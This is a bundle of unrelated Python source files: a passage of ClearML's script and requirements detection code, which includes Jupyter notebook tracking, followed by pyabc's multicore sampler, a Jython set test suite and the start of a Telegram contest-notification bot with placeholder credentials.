from azure.storage.blob import ContentSettings # noqa: F401
modules.add('azure_storage_blob', 'clearml.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard # noqa: F401
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard # noqa: F401
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'clearml', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower()
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = None, None
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
else:
name = name.replace('-', '_')
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
if v.version:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
conda_requirements += '{0}\n'.format(k)
except Exception:
conda_requirements = ''
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
except Exception:
forced_packages = {}
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
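        # e.g. (illustrative) the generated file starts with a header line such as
        # "# Python 3.8.5 (default, ...)" followed by one "package == version"
        # line per detected requirement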
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
if v.version:
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
else:
requirements_txt += '# {0}\n'.format(k)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
version = v.version
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e' and version:
requirements_txt += '{0}\n'.format(version)
elif k.startswith('-e '):
requirements_txt += '{0} {1}\n'.format(k.replace('-e ', '', 1), version or '')
elif version:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
else:
requirements_txt += '{0}\n'.format(k)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
if forced_packages[k]:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', forced_packages[k])
else:
requirements_txt += '{0}\n'.format(k)
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
        # make sure we do not exceed the size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
@staticmethod
def _remove_package_versions(installed_pkgs, package_names_to_remove_version):
installed_pkgs = {k: (v[0], None if str(k) in package_names_to_remove_version else v[1])
for k, v in installed_pkgs.items()}
return installed_pkgs
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from clearml import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
except Exception:
replace_ipython_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
max_diff_size_bytes = 500000
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
cookies = None
password = None
if server_info and server_info.get('password'):
# we need to get the password
from ....config import config
password = config.get('development.jupyter_server_password', '')
if not password:
_logger.warning(
'Password protected Jupyter Notebook server was found! '
'Add `sdk.development.jupyter_server_password=<jupyter_password>` to ~/clearml.conf')
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
r = requests.get(url=server_info['url'] + 'login')
cookies = {'_xsrf': r.cookies.get('_xsrf', '')}
r = requests.post(server_info['url'] + 'login?next', cookies=cookies,
data={'_xsrf': cookies['_xsrf'], 'password': password})
cookies.update(r.cookies)
try:
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
# send request to the jupyter server
try:
r.raise_for_status()
except Exception as ex:
_logger.warning('Failed accessing the jupyter server{}: {}'.format(
' [password={}]'.format(password) if server_info.get('password') else '', ex))
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
                # always use forward slashes, because this comes from a URI (so never a backslash, not even on Windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
            # notice that if we do not have a local file, we serialize/write the entire notebook every time
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(
str(script_path), str(cls._get_working_dir(repo_root, return_abs=True)))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _cwd(cls):
# return the current working directory (solve for hydra changing it)
# check if running with hydra
if sys.modules.get('hydra'):
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
import hydra
return Path(hydra.utils.get_original_cwd()).absolute()
except Exception:
pass
return Path.cwd().absolute()
@classmethod
def _get_working_dir(cls, repo_root, return_abs=False):
# get the repository working directory (might be different from actual cwd)
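        # e.g. (hypothetical paths) repo_root='/home/user/repo' and
        # cwd='/home/user/repo/src' -> 'src'; a cwd outside the repo falls
        # back to '.' (or to the absolute repo root when return_abs=True)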
repo_root = Path(repo_root).absolute()
cwd = cls._cwd()
try:
# do not change: test if we are under the repo root folder, it will throw an exception if we are not
relative = cwd.relative_to(repo_root).as_posix()
return cwd.as_posix() if return_abs else relative
except ValueError:
# Working directory not under repository root, default to repo root
return repo_root.as_posix() if return_abs else '.'
@classmethod
def _absolute_path(cls, file_path, cwd):
# return the absolute path, relative to a specific working directory (cwd)
file_path = Path(file_path)
if file_path.is_absolute():
return file_path.as_posix()
# Convert to absolute and squash 'path/../folder'
return os.path.abspath((Path(cwd).absolute() / file_path).as_posix())
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepaths, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
cwd = cls._cwd()
scripts_path = [Path(cls._absolute_path(os.path.normpath(f), cwd)) for f in filepaths if f]
if all(not f.is_file() for f in scripts_path):
raise ScriptInfoError(
"Script file {} could not be found".format(scripts_path)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if any(p.exists(d) for d in scripts_dir)), None)
repo_info = DetectionResult()
script_dir = scripts_dir[0]
script_path = scripts_path[0]
messages = []
auxiliary_git_diff = None
if not plugin:
if log:
log.info("No repository found, storing script code instead")
else:
try:
for i, d in enumerate(scripts_dir):
repo_info = plugin.get_info(
str(d), include_diff=check_uncommitted, diff_from_remote=uncommitted_from_remote)
if not repo_info.is_empty():
script_dir = d
script_path = scripts_path[i]
break
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
# make sure diff is not too big:
if len(diff) > cls.max_diff_size_bytes:
messages.append(
"======> WARNING! Git diff to large to store "
"({}kb), skipping uncommitted changes <======".format(len(diff)//1024))
auxiliary_git_diff = diff
diff = '# WARNING! git diff too large to store, clear this section to execute without it.\n' \
'# full git diff available in Artifacts/auxiliary_git_diff\n' \
'# Clear the section before enqueueing Task!\n'
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=remove_user_pass_from_url(repo_info.url),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
# if repo_info.modified:
# messages.append(
# "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
# script_info.get("repository", "")
# )
# )
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages, auxiliary_git_diff=auxiliary_git_diff),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log, uncommitted_from_remote=uncommitted_from_remote)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def is_running_from_module(cls):
# noinspection PyBroadException
try:
return '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']
except Exception:
return False
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if cls.is_running_from_module():
argvs = ''
git_root = os.path.abspath(script_dict['repo_root']) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(a_abs, os.path.join(git_root, script_dict['working_dir']))
argvs += ' {}'.format(a)
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(
vars(sys.modules['__main__'])['__package__'], (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
auxiliary_git_diff = attr.ib(default=None)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are in still in cell execution otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
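    # Illustrative example (hypothetical cell text): with replace_magic_bang=True,
    #   "\n%matplotlib inline\n!pip list\nget_ipython().system('ls')"
    # is rewritten to
    #   "\n# %matplotlib inline\n# !pip list\n# get_ipython().system('ls')"
    # so the exported script no longer depends on a live IPython shell.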
|
multicore.py
|
from multiprocessing import Process, Queue
from .singlecore import SingleCoreSampler
import numpy as np
import random
import logging
import cloudpickle as pickle
from jabbar import jabbar
from .multicorebase import MultiCoreSampler, get_if_worker_healthy
logger = logging.getLogger("MulticoreSampler")
SENTINEL = None
def feed(feed_q, n_jobs, n_proc):
for _ in range(n_jobs):
feed_q.put(1)
for _ in range(n_proc):
feed_q.put(SENTINEL)
def work(feed_q, result_q, simulate_one, max_eval, single_core_sampler):
# unwrap arguments
if isinstance(simulate_one, bytes):
simulate_one = pickle.loads(simulate_one)
random.seed()
np.random.seed()
while True:
arg = feed_q.get()
if arg == SENTINEL:
break
res = single_core_sampler.sample_until_n_accepted(
1, simulate_one, max_eval)
result_q.put((res, single_core_sampler.nr_evaluations_))
class MulticoreParticleParallelSampler(MultiCoreSampler):
"""
Samples on multiple cores using the multiprocessing module.
This sampler is optimized for low latencies and is efficient, even
if the individual model evaluations are fast.
Requires no pickling of the ``sample_one``,
    ``simulate_one`` and ``accept_one`` functions.
This is achieved using fork on linux (see :class:`Sampler`).
The simulation results are still pickled as they are transmitted
from the worker processes back to the parent process.
Depending on the kind of summary statistics this can be fast or slow.
If your summary statistics are only a dict with a couple of numbers,
the overhead should not be substantial.
However, if your summary statistics are large numpy arrays
    or similar, this could cause overhead.
Parameters
----------
n_procs: int, optional
        If set to None, the number of cores is determined according to
:func:`pyabc.sge.nr_cores_available`.
.. warning::
Windows support is *not* tested.
        As there is no fork on Windows, this sampler might not work.
"""
def sample_until_n_accepted(
self, n, simulate_one, t, *,
max_eval=np.inf, all_accepted=False, ana_vars=None):
# starting more than n jobs
# does not help in this parallelization scheme
n_procs = min(n, self.n_procs)
logger.debug("Start sampling on {} cores ({} requested)"
.format(n_procs, self.n_procs))
feed_q = Queue()
result_q = Queue()
feed_process = Process(target=feed, args=(feed_q, n,
n_procs))
single_core_sampler = SingleCoreSampler(
check_max_eval=self.check_max_eval)
# the max_eval handling in this sampler is certainly not optimal
single_core_sampler.sample_factory = self.sample_factory
# wrap arguments
if self.pickle:
simulate_one = pickle.dumps(simulate_one)
args = (feed_q, result_q, simulate_one, max_eval, single_core_sampler)
worker_processes = [Process(target=work, args=args)
for _ in range(n_procs)]
for proc in worker_processes:
proc.start()
feed_process.start()
collected_results = []
for _ in jabbar(range(n), enable=self.show_progress, keep=False):
res = get_if_worker_healthy(worker_processes, result_q)
collected_results.append(res)
feed_process.join()
for proc in worker_processes:
proc.join()
# Queues get closed automatically on garbage collection
# No explicit closing necessary.
results, evaluations = zip(*collected_results)
self.nr_evaluations_ = sum(evaluations)
# create 1 to-be-returned sample from results
sample = self._create_empty_sample()
for result in results:
sample += result
if sample.n_accepted < n:
sample.ok = False
return sample
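# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the pyabc API): the sentinel-terminated
# feed/worker queue pattern used by MulticoreParticleParallelSampler above,
# reduced to a self-contained toy. `_toy_work`, N_JOBS and N_PROCS are
# hypothetical names, and a fork-based start method (Linux) is assumed,
# just as for the sampler itself.
# ---------------------------------------------------------------------------
def _toy_work(feed_q, result_q):
    # consume work tokens until the SENTINEL arrives, then exit
    while True:
        arg = feed_q.get()
        if arg == SENTINEL:
            break
        result_q.put(arg)
if __name__ == '__main__':
    N_JOBS, N_PROCS = 8, 2
    feed_q, result_q = Queue(), Queue()
    # `feed` enqueues N_JOBS work tokens plus one SENTINEL per worker process
    feeder = Process(target=feed, args=(feed_q, N_JOBS, N_PROCS))
    workers = [Process(target=_toy_work, args=(feed_q, result_q))
               for _ in range(N_PROCS)]
    for proc in workers:
        proc.start()
    feeder.start()
    collected = [result_q.get() for _ in range(N_JOBS)]
    feeder.join()
    for proc in workers:
        proc.join()
    print('collected {} results'.format(len(collected)))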
|
test_set_jy.py
|
import unittest
from test import test_support
import threading
if test_support.is_jython:
from java.io import (ByteArrayInputStream, ByteArrayOutputStream,
ObjectInputStream, ObjectOutputStream)
from java.util import Random
from javatests import PySetInJavaTest
class SetTestCase(unittest.TestCase):
def test_binops(self):
class Foo(object):
__rsub__ = lambda self, other: 'rsub'
__ror__ = lambda self, other: 'ror'
__rand__ = lambda self, other: 'rand'
__rxor__ = lambda self, other: 'rxor'
foo = Foo()
s = set()
self.assertEqual(s - foo, 'rsub')
self.assertEqual(s | foo, 'ror')
self.assertEqual(s & foo, 'rand')
self.assertEqual(s ^ foo, 'rxor')
def test_pop_race(self):
# issue 1854
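        # each of the 200 threads pops exactly one element from a 200-element
        # set, so with correct locking the set must end up empty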
nthreads = 200
        # the race might not happen the first time, so we try a few times just in case
for i in xrange(4):
s = set(range(200))
threads = [threading.Thread(target=s.pop) for i in range(nthreads)]
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(len(s), 0)
def test_big_set(self):
"""Verify that fairly large collection literals of primitives can be constructed."""
# use \n to separate to avoid parser problems
s = eval("{" + ",\n".join((str(x) for x in xrange(64000))) +"}")
self.assertEqual(len(s), 64000)
self.assertEqual(sum(s), 2047968000)
class SetInJavaTestCase(unittest.TestCase):
"""Tests for derived dict behaviour"""
def test_using_PySet_as_Java_Set(self):
PySetInJavaTest.testPySetAsJavaSet()
def test_accessing_items_added_in_java(self):
s = PySetInJavaTest.createPySetContainingJavaObjects()
for v in s:
self.assert_(v in s)
if isinstance(v, unicode):
self.assertEquals("value", v)
else:
# Should be a java.util.Random; ensure we can call it
v.nextInt()
def test_java_accessing_items_added_in_python(self):
# Test a type that should be coerced into a Java type, a Java
# instance that should be wrapped, and a Python instance that
# should pass through as itself with str, Random and tuple
# respectively.
s = set(["value", Random(), ("tuple", "of", "stuff")])
PySetInJavaTest.accessAndRemovePySetItems(s)
# Check that the Java removal affected the underlying set
self.assertEquals(0, len(s))
def test_serialization(self):
s = set(range(5, 10))
output = ByteArrayOutputStream()
serializer = ObjectOutputStream(output)
serializer.writeObject(s)
serializer.close()
input = ByteArrayInputStream(output.toByteArray())
unserializer = ObjectInputStream(input)
self.assertEqual(s, unserializer.readObject())
def test_main():
tests = [SetTestCase]
if test_support.is_jython:
tests.append(SetInJavaTestCase)
test_support.run_unittest(*tests)
if __name__ == '__main__':
test_main()
|
contestNoti_Bot.py
|
#-*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import pickle
from ContestParser import *
from MyScheduler import * # import Scheduler
from SupportMysql import * # import SQL support class
import threading
# Telegram interface
import telebot
from telebot import types, apihelper
API_TOKEN = '<INPUT_YOUR_API_KEY>'
bot = telebot.TeleBot(API_TOKEN)
administratorChatID = '<INPUT_YOUR_TELEGRAM_CHAT_ID>'
host = '<INPUT_YOUR_DATABASE_SERVER_HOST>'
